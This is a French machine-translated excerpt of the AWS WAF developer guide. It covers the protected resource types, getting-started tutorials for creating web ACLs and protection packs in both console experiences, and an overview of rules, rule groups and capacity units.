**Présentation d'une nouvelle expérience de console pour AWS WAF**

Vous pouvez désormais utiliser l'expérience mise à jour pour accéder aux AWS WAF fonctionnalités n'importe où dans la console. Pour plus de détails, consultez la section [Utilisation de la console](https://docs.aws.amazon.com/waf/latest/developerguide/working-with-console.html). 

Les traductions sont fournies par des outils de traduction automatique. En cas de conflit entre le contenu d'une traduction et celui de la version originale en anglais, la version anglaise prévaudra.

# AWS WAF
<a name="waf-chapter"></a>

AWS WAF est un pare-feu d'applications Web qui vous permet de surveiller les requêtes HTTP (S) qui sont transmises aux ressources protégées de votre application Web. Vous pouvez protéger les types de ressources suivants : 
+  CloudFront Distribution sur Amazon
+ API REST d'Amazon API Gateway
+ Application Load Balancer
+ AWS AppSync API GraphQL
+ Groupe d’utilisateurs Amazon Cognito
+ AWS App Runner service
+ AWS Instance d'accès vérifié
+ AWS Amplify

AWS WAF vous permet de contrôler l'accès à votre contenu. Sur la base de critères que vous spécifiez, tels que les adresses IP d'où proviennent les demandes ou les valeurs des chaînes de requête, le service associé à votre ressource protégée répond aux demandes soit avec le contenu demandé, soit avec un code d'état HTTP 403 (Interdit), soit avec une réponse personnalisée. 

**Note**  
Vous pouvez également l'utiliser AWS WAF pour protéger vos applications hébergées dans des conteneurs Amazon Elastic Container Service (Amazon ECS). Amazon ECS est un service de gestion de conteneurs rapide et hautement évolutif qui facilite l'exécution, l'arrêt et la gestion des conteneurs Docker sur un cluster. Pour utiliser cette option, vous configurez Amazon ECS de manière à utiliser un Application Load Balancer activé AWS WAF pour acheminer et protéger le trafic HTTP (S) de couche 7 entre les tâches de votre service. Pour plus d'informations, consultez la section [Service Load Balancing](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/service-load-balancing.html) dans le manuel *Amazon Elastic Container Service Developer Guide*.

**Topics**
+ [Commencez avec AWS WAF](getting-started.md)
+ [Comment AWS WAF fonctionne](how-aws-waf-works.md)
+ [Configuration de la protection dans AWS WAF](web-acl.md)
+ [AWS WAF règles](waf-rules.md)
+ [AWS WAF groupes de règles](waf-rule-groups.md)
+ [Unités de capacité Web ACL (WCUs) en AWS WAF](aws-waf-capacity-units.md)
+ [Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md)
+ [Syntaxe d'expression régulière prise en charge dans AWS WAF](waf-regex-pattern-support.md)
+ [Ensembles d'adresses IP et ensembles de modèles regex dans AWS WAF](waf-referenced-set-managing.md)
+ [Demandes et réponses Web personnalisées dans AWS WAF](waf-custom-request-response.md)
+ [Étiquetage des requêtes Web dans AWS WAF](waf-labels.md)
+ [Atténuation intelligente des menaces dans AWS WAF](waf-managed-protections.md)
+ [Protection des données et journalisation pour le trafic du pack de AWS WAF protection (ACL Web)](waf-data-protection-and-logging.md)
+ [Tester et ajuster vos AWS WAF protections](web-acl-testing.md)
+ [Utilisation AWS WAF avec Amazon CloudFront](cloudfront-features.md)
+ [Sécurité lors de votre utilisation du AWS WAF service](security.md)
+ [AWS WAF quotas](limits.md)
+ [Migration de vos ressources AWS WAF classiques vers AWS WAF](waf-migrating-from-classic.md)

# Commencez avec AWS WAF
<a name="getting-started"></a>

 La mise en route AWS WAF dépend de l'expérience de console que vous utilisez. Les deux expériences donnent accès aux mêmes AWS WAF fonctionnalités de base, mais elles diffèrent quant à la manière dont vous configurez et gérez les protections de vos applications Web. 

 AWS WAF propose deux options d'utilisation de la console :

 La **nouvelle console** vise à simplifier le processus de configuration des ACL Web requis par les flux de travail de console standard. Vous pouvez utiliser des flux de travail guidés pour simplifier le processus de création et de gestion des ACL Web grâce à un pack de protection. Un pack de protection facilite l'utilisation et la gestion du Web ACLs dans la console, mais n'est pas différent fonctionnellement d'une ACL Web. Outre l'amélioration du processus de configuration de la protection, la nouvelle console offre une meilleure visibilité de vos protections grâce à des tableaux de bord de sécurité, ce qui facilite le suivi de votre niveau de sécurité au sein de la AWS WAF console. 

 La ** AWS WAF console standard** fournit une approche traditionnelle pour configurer les protections par pare-feu des applications Web à l'aide du Web ACLs. Il offre un contrôle granulaire des règles individuelles et des groupes de règles et est familier aux AWS WAF utilisateurs existants. Cette console vous permet de contrôler en détail vos configurations de protection, ce qui permet de personnaliser précisément vos paramètres de sécurité. 

**Astuce**  
 Choisissez l'expérience console qui répond le mieux à vos besoins. Si vous débutez dans le domaine des protections AWS WAF ou si vous souhaitez commencer à les configurer en fonction AWS des recommandations, nous vous recommandons de commencer par la nouvelle expérience de console. Toutefois, l'expérience standard peut toujours être ouverte depuis le volet de navigation de la console. 

 Les sections suivantes fournissent des conseils de démarrage pour les deux expériences de console. Passez en revue chaque approche et sélectionnez celle qui correspond le mieux à vos exigences de sécurité et à vos préférences opérationnelles : 

**Topics**
+ [Commencer à AWS WAF utiliser la nouvelle expérience de console](setup-iap-console.md)
+ [Commencer à AWS WAF utiliser l'expérience de console standard](setup-existing-console.md)

# Commencer à AWS WAF utiliser la nouvelle expérience de console
<a name="setup-iap-console"></a>

Cette section vous guide tout au long de la configuration à AWS WAF l'aide de la nouvelle expérience de console, qui fournit des flux de travail de configuration simplifiés et des fonctionnalités de gestion de la sécurité améliorées.

## Accédez à la nouvelle expérience de console
<a name="accessing-iap-console"></a>

Pour accéder à la nouvelle expérience de AWS WAF console :

Connectez-vous à la nouvelle version AWS Management Console et ouvrez la AWS WAF console à l'adresse [https://console.aws.amazon.com/wafv2-pro.](https://console.aws.amazon.com/wafv2-pro) 
+ Dans le volet de navigation, recherchez et sélectionnez **Essayer la nouvelle expérience**.

**Note**  
Vous pouvez passer d'une expérience de console à l'autre à tout moment à l'aide du lien dans le volet de navigation.

## Commencez avec un pack de protection (ACL Web)
<a name="getting-started-protection-packs"></a>

Ce didacticiel explique comment créer et configurer un pack de protection (ACL Web) pour protéger vos applications. Les packs de protection (Web ACLs) fournissent des règles de sécurité préconfigurées adaptées à des types de charge de travail spécifiques.

Dans ce didacticiel, vous allez découvrir comment :
+ Création d'un pack de protection (ACL Web)
+ Configuration des paramètres de protection spécifiques à l'application
+ Ajoutez AWS des ressources pour protéger
+ Choisissez et personnalisez les règles
+ Configuration de la journalisation et de la surveillance

**Note**  
AWS vous facture généralement moins de 0,25 USD par jour pour les ressources que vous créez au cours de ce didacticiel. Lorsque vous avez terminé, nous vous recommandons de supprimer les ressources pour éviter de générer des frais supplémentaires.

### Étape 1 : Configuration AWS WAF
<a name="getting-started-prerequisites"></a>

Si vous n'avez pas encore suivi les étapes générales de configuration[Configuration de votre compte pour utiliser les services](setting-up-waf.md), faites-le maintenant.

### Étape 2 : Création d'un pack de protection (ACL Web)
<a name="getting-started-create-protection-pack"></a>

Au cours de cette étape, vous allez créer un pack de protection (ACL Web) et configurer ses paramètres de base en fonction de votre type d'application.

1. Connectez-vous à la nouvelle version AWS Management Console et ouvrez la AWS WAF console à l'adresse [https://console.aws.amazon.com/wafv2-pro.](https://console.aws.amazon.com/wafv2-pro) 

1. Dans le volet de navigation, sélectionnez **Resources & protection packs (web ACLs)**.

1. Sur la page **Ressources et packs de protection (Web ACLs)**, choisissez **Ajouter un pack de protection (ACL Web)**.

1. Sous **Parlez-nous de votre application**, dans **Catégorie d'applications**, sélectionnez une ou plusieurs catégories d'applications qui décrivent le mieux votre application.

1. Pour **Source de trafic**, choisissez le type de trafic géré par votre application :
   + **API** - Pour les applications utilisant uniquement des API
   + **Web** - Pour les applications Web uniquement
   + **API et Web** : pour les applications qui gèrent les deux types de trafic

### Étape 3 : ajouter des ressources pour protéger
<a name="getting-started-add-resources"></a>

Vous allez maintenant spécifier les AWS ressources à protéger avec votre pack de protection (ACL Web).

1. Sous **Ressources à protéger**, choisissez **Ajouter des ressources**.

1. Choisissez la catégorie de AWS ressource à associer à ce pack de protection (ACL Web) :
   +  CloudFront Distributions Amazon
   + Ressources régionales

   Pour plus d'informations sur les types de ressources, consultez[Associer une protection à une AWS ressource](web-acl-associating.md).

### Étape 4 : Choisissez les protections initiales
<a name="getting-started-configure-protection"></a>

Au cours de cette étape, vous allez sélectionner les règles de votre pack de protection (ACL Web). Pour les nouveaux utilisateurs, nous recommandons de choisir l'option **Recommandé**.

AWS WAF génère **Recommandé** pour vous en fonction de vos sélections dans la section **Parlez-nous de votre application**. Ces packs mettent en œuvre les meilleures pratiques de sécurité pour votre type d'application.
+  Choisissez **Next** pour poursuivre la configuration du pack de protection (ACL Web).

**Note**  
Si vous souhaitez créer des règles personnalisées ou utiliser l'option **You build it**, nous vous recommandons de commencer par vous familiariser avec les options préconfigurées. Pour plus d'informations sur la création de packs de protection personnalisés (Web ACLs) et de règles, consultez[Création d'un pack de protection (ACL Web) dans AWS WAF](web-acl-creating.md).

### Étape 5 : Personnalisation des paramètres du pack de protection (ACL Web)
<a name="getting-started-customize-settings"></a>

Vous allez maintenant configurer des paramètres supplémentaires tels que les actions par défaut, les limites de débit et la journalisation.

1. Sous **Nom et description**, entrez le nom de votre pack de protection (ACL Web). Entrez éventuellement une description.
**Note**  
Vous ne pouvez pas modifier le nom après avoir créé le pack de protection (ACL Web).

1. Sous **Personnaliser le pack de protection (ACL Web)**, configurez les paramètres suivants :

   1. Sous **Actions de règle par défaut**, choisissez l'action par défaut pour les demandes qui ne correspondent à aucune règle. Pour de plus amples informations, veuillez consulter [Demandes et réponses Web personnalisées dans AWS WAF](waf-custom-request-response.md).

   1. Sous **Configuration des règles**, personnalisez les paramètres suivants :
      + **Limites de débit par défaut** - Définissez des limites pour vous protéger contre les attaques DDo S
      + **Adresses IP** - Configuration des allow/block listes d'adresses IP
      + **Origines spécifiques au pays** - Gérez l'accès par pays

   1. Pour **Destination de journalisation**, configurez l'endroit où vous souhaitez stocker les journaux. Pour de plus amples informations, veuillez consulter [AWS WAF destinations de journalisation](logging-destinations.md).

1. Vérifiez vos paramètres et choisissez **Ajouter un pack de protection (ACL Web)**.

### Étape 6 : Nettoyer vos ressources
<a name="getting-started-clean-up"></a>

Vous avez maintenant terminé le didacticiel. Pour éviter que votre compte n'entraîne des AWS WAF frais supplémentaires, vous devez soit supprimer le pack de protection (ACL Web) que vous avez créé, soit le modifier en fonction de vos besoins de production.

**Pour supprimer votre pack de protection (ACL Web)**

1. Dans le volet de navigation, sélectionnez **Resources & protection packs (web ACLs)**.

1. Sélectionnez le pack de protection (ACL Web) que vous avez créé.

1. Choisissez l'icône de la corbeille, puis confirmez la suppression en tapant « supprimer ».

**Note**  
Si vous prévoyez d'utiliser ce pack de protection (ACL Web) en production, au lieu de le supprimer, vous devez revoir et ajuster les paramètres de protection en fonction des exigences de sécurité de votre application.

# Commencer à AWS WAF utiliser l'expérience de console standard
<a name="setup-existing-console"></a>

La AWS WAF console vous guide tout au long du processus de configuration AWS WAF pour bloquer ou autoriser les requêtes Web en fonction de critères que vous spécifiez, tels que les adresses IP d'où proviennent les demandes ou les valeurs contenues dans les demandes. Au cours de cette étape, vous allez créer un pack de protection (ACL Web). Pour plus d'informations sur les packs de AWS WAF protection (Web ACLs), consultez[Configuration de la protection dans AWS WAF](web-acl.md).

Ce didacticiel montre comment AWS WAF effectuer les tâches suivantes :
+ Configurez AWS WAF.
+ Créez une liste de contrôle d'accès Web (ACL Web) à l'aide de l'assistant de la AWS WAF console.

**Pour créer une liste ACL web**

  1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

  1. Sur la page d' AWS WAF accueil, choisissez **Create web ACL**. 

  1. Dans **Nom (Nom)**, entrez le nom que vous souhaitez utiliser pour identifier cette liste ACL web. 
**Note**  
Vous ne pouvez pas modifier le nom une fois que vous créez la liste ACL web.

  1. (Facultatif) Pour **Description - facultatif**, entrez une description plus longue pour la liste ACL web si vous le souhaitez. 

  1. Pour **CloudWatch metric name**, modifiez le nom par défaut le cas échéant. Suivez les instructions sur la console pour connaître les caractères valides. Le nom ne peut pas contenir de caractères spéciaux, d'espaces blancs ou de noms de métriques réservés pour AWS WAF, y compris « All » et « Default\$1Action ». « 
**Note**  
Vous ne pouvez pas modifier le nom de la CloudWatch métrique après avoir créé l'ACL Web.

  1. Pour **Type de ressource**, choisissez **CloudFrontles distributions**. La **région** est automatiquement renseignée en **Global (CloudFront)** pour les CloudFront distributions.

  1. (Facultatif) Pour ** AWS Ressources associées : facultatif**, choisissez **Ajouter AWS des ressources**. Dans la boîte de dialogue, choisissez les ressources que vous souhaitez associer, puis cliquez sur **Ajouter**. AWS WAF vous renvoie à la page **Describe Web ACL et aux AWS ressources associées**. 

  1. Choisissez **Suivant**.

**Note**  
AWS vous facture généralement moins de 0,25 USD par jour pour les ressources que vous créez au cours de ce didacticiel. Lorsque vous avez terminé les opérations dans le cadre de ce didacticiel, nous vous recommandons de supprimer les ressources pour éviter de générer des frais supplémentaires. 

## Étape 1 : Configuration AWS WAF
<a name="getting-started-aws-account"></a>

Si vous n'avez pas encore suivi les étapes générales de configuration[Configuration de votre compte pour utiliser les services](setting-up-waf.md), faites-le maintenant.

## Étape 2 : Création d'une ACL Web
<a name="getting-started-wizard-create-web-acl"></a>

La AWS WAF console vous guide tout au long du processus de configuration AWS WAF pour bloquer ou autoriser les requêtes Web en fonction de critères que vous spécifiez, tels que les adresses IP d'où proviennent les demandes ou les valeurs contenues dans les demandes. Au cours de cette étape, vous créez une liste ACL Web. Pour plus d'informations sur AWS WAF le Web ACLs, consultez[Configuration de la protection dans AWS WAF](web-acl.md).

**Pour créer une liste ACL web**

1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

1. Sur la page d' AWS WAF accueil, choisissez **Create web ACL**.

1. Dans **Nom (Nom)**, entrez le nom que vous souhaitez utiliser pour identifier cette liste ACL web.
**Note**  
Vous ne pouvez pas modifier le nom une fois que vous créez la liste ACL web.

1. (Facultatif) Pour **Description - facultatif**, entrez une description plus longue pour la liste ACL web si vous le souhaitez.

1. Pour **CloudWatch metric name**, modifiez le nom par défaut le cas échéant. Suivez les instructions sur la console pour connaître les caractères valides. Le nom ne peut pas contenir de caractères spéciaux, d'espaces blancs ou de noms de métriques réservés pour AWS WAF, y compris « All » et « Default\$1Action ». « 
**Note**  
Vous ne pouvez pas modifier le nom de la CloudWatch métrique après avoir créé l'ACL Web.

1. Pour **Type de ressource**, choisissez **CloudFrontles distributions**. La **région** est automatiquement renseignée en **Global (CloudFront)** pour les CloudFront distributions.

1. (Facultatif) Pour ** AWS Ressources associées : facultatif**, choisissez **Ajouter AWS des ressources**. Dans la boîte de dialogue, choisissez les ressources que vous souhaitez associer, puis cliquez sur **Ajouter**. AWS WAF vous renvoie à la page **Describe Web ACL et aux AWS ressources associées**.

1. Choisissez **Suivant**.

## Étape 3 : Ajouter une règle de correspondance de chaîne
<a name="getting-started-wizard-create-string-condition"></a>

Dans cette étape, vous créez une règle avec une instruction de correspondance de chaîne et indiquez ce qu'il faut faire avec les demandes de correspondance. Une instruction de règle de correspondance de chaînes identifie les chaînes que vous AWS WAF souhaitez rechercher dans une demande. Généralement, une chaîne est composée de caractères ASCII imprimables, mais vous pouvez spécifier n'importe quel caractère de valeur hexadécimale 0x00 à 0xFF (de valeur décimale 0 à 255). Outre la chaîne à rechercher, vous spécifiez le composant de requête Web que vous souhaitez rechercher, tel qu'un en-tête, une chaîne de requête ou le corps de la demande. 

Ce type d'instruction fonctionne sur un composant de requête Web et nécessite les paramètres de composant de demande suivants : 
+ **Composant de demande** : partie de la requête Web destinée à inspecter, par exemple, une chaîne de requête ou le corps de la requête.
**Avertissement**  
Si vous inspectez les composants de la requête **Body**, **JSON body**, **Headers** ou **Cookies, renseignez-vous** sur les limites relatives à [Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md) la quantité de contenu AWS WAF pouvant être inspectée. 

  Pour plus d'informations sur les composants des requêtes Web, consultez[Réglage des paramètres des instructions de règle dans AWS WAF](waf-rule-statement-fields.md).
+ Transformations de **texte facultatives : transformations** que vous AWS WAF souhaitez effectuer sur le composant de demande avant de l'inspecter. Par exemple, vous pouvez passer en minuscules ou normaliser les espaces blancs. Si vous spécifiez plusieurs transformations, AWS WAF traitez-les dans l'ordre indiqué. Pour plus d'informations, consultez [Utilisation de transformations de texte dans AWS WAF](waf-rule-statement-transformation.md).

Pour plus d'informations sur AWS WAF les règles, consultez[AWS WAF règles](waf-rules.md). 

**Pour créer une instruction de règle de correspondance de chaîne**

1. Sur la page **Ajouter des règles et des groupes de règles**, choisissez **Ajouter des règles**, **Ajouter mes propres règles et groupes de règles**, **Générateur de règles**, puis **Éditeur visuel de règles**. 
**Note**  
La console fournit l' **éditeur visuel de règles** ainsi qu'un **éditeur JSON de règles**. L'éditeur JSON vous permet de copier facilement des configurations entre le Web ACLs et est nécessaire pour les ensembles de règles plus complexes, tels que ceux comportant plusieurs niveaux d'imbrication.   
Cette procédure utilise l' **éditeur visuel de règles**. 

1. Dans la zone **Nom**, entrez le nom que vous souhaitez utiliser pour identifier cette règle. 

1. Pour **Type** choisissez **Règle régulière**.

1. Pour **Si une demande** choisissez **correspond à l'instruction**. 

   Les autres options concernent les types d'instructions de règles logiques. Vous pouvez les utiliser pour combiner ou annuler les résultats d'autres déclarations de règles. 

1. **Dans Statement**, pour **Inspect**, ouvrez le menu déroulant et choisissez le composant de requête Web que vous AWS WAF souhaitez inspecter. Pour cet exemple, choisissez **En-tête unique**.

   Lorsque vous choisissez **En-tête unique**, vous spécifiez également l'en-tête que vous AWS WAF souhaitez inspecter. Saisissez **User-Agent**. Cette valeur n'est pas sensible à la casse.

1. Pour **Type de correspondance**, choisissez l'endroit où la chaîne spécifiée doit apparaître dans l'en-tête `User-Agent`. 

   Pour cet exemple, choisissez **Exactly matches string (Correspond exactement à la chaîne)**. Cela indique qu'il AWS WAF inspecte l'en-tête de l'agent utilisateur dans chaque requête Web à la recherche d'une chaîne identique à celle que vous spécifiez.

1. Pour que **String to match (Chaîne de correspondance)**, spécifiez la chaîne que AWS WAF doit rechercher. La longueur maximale de **String to match (Chaîne de correspondance)** est 200 caractères. Si vous souhaitez spécifier une valeur codée en base64, vous pouvez spécifier jusqu'à 200 caractères avant l'encodage.

   Pour cet exemple, entrez **MyAgent**. AWS WAF inspectera la valeur de l'`User-Agent`en-tête dans les requêtes Web`MyAgent`.

1. Laissez **Text transformation (Transformation de texte)** définie sur **None (Aucun)**. 

1. Pour **Action**, sélectionnez l'action que vous souhaitez que la règle exécute lorsqu'elle correspond à une requête Web. Pour cet exemple, choisissez **Count** et laissez les autres choix tels quels. L'action de comptage crée des métriques pour les requêtes Web conformes à la règle, mais n'a aucune incidence sur le fait que la demande soit autorisée ou bloquée. Pour plus d'informations sur les choix d'action, reportez-vous [Utilisation des actions liées aux règles dans AWS WAF](waf-rule-action.md) aux sections et[Définition de la priorité des règles](web-acl-processing-order.md).

1. Choisissez **Ajouter une règle**.

## Étape 4 : Ajouter un groupe de règles AWS gérées
<a name="getting-started-wizard-add-rule-group"></a>

AWS Managed Rules propose un ensemble de groupes de règles gérés que vous pouvez utiliser, dont la plupart sont gratuits pour AWS WAF les clients. Pour de plus amples informations sur les groupes de correctifs, veuillez consulter [AWS WAF groupes de règles](waf-rule-groups.md). Nous allons ajouter un groupe de règles AWS gérées à cette ACL Web. 

**Pour ajouter un groupe de règles AWS gérées**

1. Dans la page **Ajouter des règles et des groupes de règles**, choisissez **Ajouter des règles**, puis **Ajouter des groupes de règles gérées**. 

1. Dans la page **Ajouter des groupes de règles gérées** développez la liste des **groupes de règles gérées par AWS **. (Vous verrez également les offres proposées aux AWS Marketplace vendeurs. Vous pouvez vous abonner à leurs offres, puis les utiliser de la même manière que pour les groupes de règles AWS Managed Rules.)

1. Pour le groupe de règles que vous souhaitez ajouter, procédez comme suit : 

   1. Dans la colonne **Action**, activez le bouton **Ajouter à l'ACL Web**. 

   1. Sélectionnez **Modifier** et, dans la liste des **règles du groupe de règles**, ouvrez le menu déroulant **Annuler toutes les actions des règles** et sélectionnez. **Count** Cela définit l'action pour que toutes les règles du groupe de règles soient uniquement comptabilisées. Cela vous permet de voir comment toutes les règles du groupe de règles se comportent avec vos requêtes Web avant de les utiliser.

   1. Choisissez **Enregistrer la règle**.

1. Sur la page **Ajouter des groupes de règles gérés**, sélectionnez **Ajouter des règles**. Cela vous renvoie à la page **Ajouter des règles et des groupes** de règles.

## Étape 5 : terminer la configuration de votre ACL Web
<a name="getting-started-wizard-finish-webacl-options"></a>

Lorsque vous avez terminé d'ajouter des règles et des groupes de règles à votre configuration ACL web, terminez en gérant la priorité des règles dans la liste ACL web et en configurant des paramètres tels que les métriques, le balisage et la journalisation. 

**Pour terminer la configuration de la liste ACL web**

1. Dans la page **Ajouter des règles et des groupes de règles**, choisissez **Suivant**. 

1. Sur la page **Définir la priorité des règles**, vous pouvez voir l'ordre de traitement des règles et des groupes de règles dans l'ACL Web. AWS WAF les traite en commençant par le haut de la liste. Vous pouvez modifier l'ordre de traitement en déplaçant les règles vers le haut ou vers le bas. Pour ce faire, sélectionnez-en une dans la liste et choisissez **Déplacer vers le haut** ou **Déplacer vers le bas**. Pour plus d’informations sur la priorité des règles, consultez [Définition de la priorité des règles](web-acl-processing-order.md). 

1. Choisissez **Suivant**.

1. Sur la page **Configurer les métriques**, pour les ** CloudWatchmétriques Amazon**, vous pouvez voir les métriques planifiées pour vos règles et groupes de règles, ainsi que les options d'échantillonnage des requêtes Web. Pour plus d'informations sur l'affichage des exemples de demandes, consultez[Affichage d'un exemple de demandes web](web-acl-testing-view-sample.md). Pour plus d'informations sur CloudWatch les métriques Amazon, consultez[Surveillance avec Amazon CloudWatch](monitoring-cloudwatch.md). 

   Vous pouvez accéder aux résumés des mesures du trafic Web sur la page de l'ACL Web dans la AWS WAF console, sous l'onglet **Aperçu du trafic**. Les tableaux de bord de la console fournissent des résumés en temps quasi réel des métriques Amazon CloudWatch de l'ACL Web. Pour de plus amples informations, veuillez consulter [Tableaux de bord d'aperçu du trafic pour les packs de protection (Web ACLs)](web-acl-dashboards.md). 

1. Choisissez **Suivant**.

1. Sur la page **Vérifier et créer les listes ACL web** vérifiez vos paramètres, puis choisissez **Créer une liste ACL web**. 

L'assistant vous renvoie à la page **ACL Web**, où votre nouvelle ACL Web est répertoriée.

## Étape 6 : Nettoyer vos ressources
<a name="getting-started-wizard-clean-up"></a>

Vous avez maintenant terminé le didacticiel. Pour éviter que votre compte n'entraîne des AWS WAF frais supplémentaires, nettoyez les AWS WAF objets que vous avez créés. Vous pouvez également modifier la configuration pour qu'elle corresponde aux requêtes Web que vous souhaitez réellement gérer à l'aide de celles-ci AWS WAF.

**Note**  
AWS vous facture généralement moins de 0,25 USD par jour pour les ressources que vous créez au cours de ce didacticiel. Lorsque vous avez terminé, nous vous recommandons de supprimer les ressources pour éviter de générer des frais supplémentaires. 

**Pour supprimer les objets AWS WAF payants**

1. Sur la page **ACL Web**, sélectionnez votre ACL Web dans la liste et choisissez **Modifier**. 

1. Dans l'onglet ** AWS Ressources associées**, pour chaque ressource associée, sélectionnez le bouton radio à côté du nom de la ressource, puis choisissez **Dissocier**. Cela dissocie l'ACL Web de vos AWS ressources. 

1. Dans chacun des écrans suivants, choisissez **Next** jusqu'à ce que vous reveniez à la page **Web ACL**.

   Sur la page **ACL Web**, sélectionnez votre ACL Web dans la liste et choisissez **Supprimer**. 

Les règles et les instructions de règle n'existent pas en dehors des définitions de groupe de règles et de listes ACL Web. Si vous supprimez une liste ACL Web, toutes les règles individuelles que vous avez définies dans la liste ACL Web sont supprimées. Lorsque vous supprimez un groupe de règles d'une liste ACL Web, vous supprimez simplement la référence à celui-ci. 

# Comment AWS WAF fonctionne
<a name="how-aws-waf-works"></a>

Vous pouvez AWS WAF contrôler la façon dont vos ressources protégées répondent aux requêtes Web HTTP (S). Pour ce faire, définissez une liste de contrôle d'accès Web (ACL Web), puis associez-la à une ou plusieurs ressources d'applications Web que vous souhaitez protéger. Les ressources associées transmettent les demandes entrantes à l'ACL Web AWS WAF pour inspection. 

La **nouvelle console** simplifie le processus de configuration des ACL Web. Il introduit des packs de protection pour rationaliser la configuration tout en gardant un contrôle total sur vos règles de sécurité. 

Les packs de protection constituent le nouvel emplacement du Web ACLs et simplifient la gestion des ACL Web dans la console, mais ils ne modifient pas les fonctionnalités ACL Web sous-jacentes. Lorsque vous utilisez la console standard ou l'API, vous continuerez à travailler directement avec le Web ACLs.

Dans votre pack de protection (ACL Web), vous créez des règles pour définir les modèles de trafic à rechercher dans les demandes et pour spécifier les actions à effectuer pour les demandes correspondantes. Les options d'action sont les suivantes : 
+ Autorisez les demandes à être envoyées à la ressource protégée pour traitement et réponse. 
+ Bloquez les demandes. 
+ Comptez les demandes. 
+ Exécutez des CAPTCHA ou des contrôles par rapport aux demandes afin de vérifier que les utilisateurs sont humains et que vous utilisez un navigateur standard. 

**AWS WAF composants**  
Voici les principaux éléments de AWS WAF :
+ **web ACLs** — Vous utilisez une liste de contrôle d'accès Web (ACL Web) pour protéger un ensemble de AWS ressources. Vous créez une liste ACL Web et définissez sa stratégie de protection en ajoutant des règles. Les règles définissent les critères d'inspection des requêtes Web et spécifient les mesures à prendre pour les demandes correspondant à ces critères. Vous définissez également une action par défaut pour l'ACL Web qui indique s'il faut bloquer ou autoriser les demandes que les règles n'ont pas déjà bloquées ou autorisées. Pour plus d'informations sur le Web ACLs, consultez[Configuration de la protection dans AWS WAF](web-acl.md).

  Une ACL Web est une AWS WAF ressource.
+ **Packs de protection (ACL Web)** : dans la nouvelle console, les packs de protection constituent le nouvel emplacement de votre site Web ACLs. Au cours de la configuration, vous fournissez des informations sur vos applications et vos ressources. AWS WAF recommande un pack de protection adapté à votre scénario, puis crée une ACL Web contenant les règles, les groupes de règles et les actions définis par le pack de protection (ACL Web) que vous choisissez. Pour plus d'informations sur les packs de protection (Web ACLs), consultez[Configuration de la protection dans AWS WAF](web-acl.md).

  Un pack de protection (ACL Web) est une AWS WAF ressource.
+ **Règles** : chaque règle contient une déclaration qui définit les critères d'inspection et une action à entreprendre si une requête Web répond aux critères. Lorsqu'une demande Web répond aux critères, c'est une correspondance. Vous pouvez configurer des règles pour bloquer les demandes correspondantes, les autoriser à passer, les compter ou exécuter des contrôles par bot à l'aide de puzzles CAPTCHA ou de défis de navigateur client silencieux. Pour plus d’informations sur les règles, consultez [AWS WAF règles](waf-rules.md). 

  Une règle n'est pas une AWS WAF ressource. Il n'existe que dans le contexte d'un pack de protection (ACL Web) ou d'un groupe de règles.
+ **Groupes de règles** : vous pouvez définir des règles directement dans un pack de protection (ACL Web) ou dans des groupes de règles réutilisables. AWS Règles gérées et AWS Marketplace les vendeurs mettent à votre disposition des groupes de règles gérés. Vous pouvez également définir vos propres groupes de règles. Pour de plus amples informations sur les groupes de correctifs, veuillez consulter [AWS WAF groupes de règles](waf-rule-groups.md). 

  Un groupe de règles est une AWS WAF ressource.
+ **unités de capacité ACL Web (WCUs)** : AWS WAF utilisées WCUs pour calculer et contrôler les ressources d'exploitation nécessaires à l'exécution de vos règles, groupes de règles, packs de protection (Web ACLs) ou Web ACLs. 

  Une WCU n'est pas une AWS WAF ressource. Il n'existe que dans le contexte d'un pack de protection (ACL Web), d'une règle ou d'un groupe de règles.

# Des ressources que vous pouvez protéger AWS WAF
<a name="how-aws-waf-works-resources"></a>

Vous pouvez utiliser un pack de AWS WAF protection (ACL Web) pour protéger les types de ressources mondiaux ou régionaux. Pour ce faire, associez le pack de protection (ACL Web) aux ressources que vous souhaitez protéger. Le pack de protection (ACL Web) et toutes les AWS WAF ressources qu'il utilise doivent se trouver dans la région où se trouve la ressource associée. Pour les CloudFront distributions Amazon, cette option est définie sur USA Est (Virginie du Nord).

**CloudFront Distributions Amazon**  
Vous pouvez associer un pack de AWS WAF protection (ACL Web) à une CloudFront distribution à l'aide de la AWS WAF console ou APIs. Vous pouvez également associer un pack de protection (ACL Web) à une CloudFront distribution lorsque vous créez ou mettez à jour la distribution elle-même. Pour configurer une association dans AWS CloudFormation, vous devez utiliser la configuration CloudFront de distribution. Pour plus d'informations sur Amazon CloudFront, consultez la section [Utiliser AWS WAF pour contrôler l'accès à votre contenu](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/distribution-web-awswaf.html) dans le manuel *Amazon CloudFront Developer Guide*.

AWS WAF est disponible dans le monde entier pour les CloudFront distributions, mais vous devez utiliser la région USA Est (Virginie du Nord) pour créer votre pack de protection (ACL Web) et toutes les ressources utilisées dans le pack de protection (ACL Web), telles que les groupes de règles, les ensembles d'adresses IP et les ensembles de modèles regex. Certaines interfaces proposent le choix de région « Global (CloudFront) ». Le choix de cette option est identique à celui de la région USA Est (Virginie du Nord) ou « us-east-1 ».

**Ressources régionales**  
Vous pouvez protéger les ressources régionales dans toutes les régions où AWS WAF elles sont disponibles. Vous pouvez consulter la liste des [AWS WAF points de terminaison et des quotas](https://docs.aws.amazon.com/general/latest/gr/waf.html) dans le *Référence générale d'Amazon Web Services*. 

Vous pouvez l'utiliser AWS WAF pour protéger les types de ressources régionaux suivants : 
+ API REST d'Amazon API Gateway
+ Application Load Balancer
+ AWS AppSync API GraphQL
+ Groupe d’utilisateurs Amazon Cognito
+ AWS App Runner service
+ AWS Instance d'accès vérifié
+ AWS Amplify

Vous ne pouvez associer un pack de protection (ACL Web) qu'à un Application Load Balancer qui s'y trouve. Régions AWS Par exemple, vous ne pouvez pas associer un pack de protection (ACL Web) à un Application Load Balancer activé. AWS Outposts

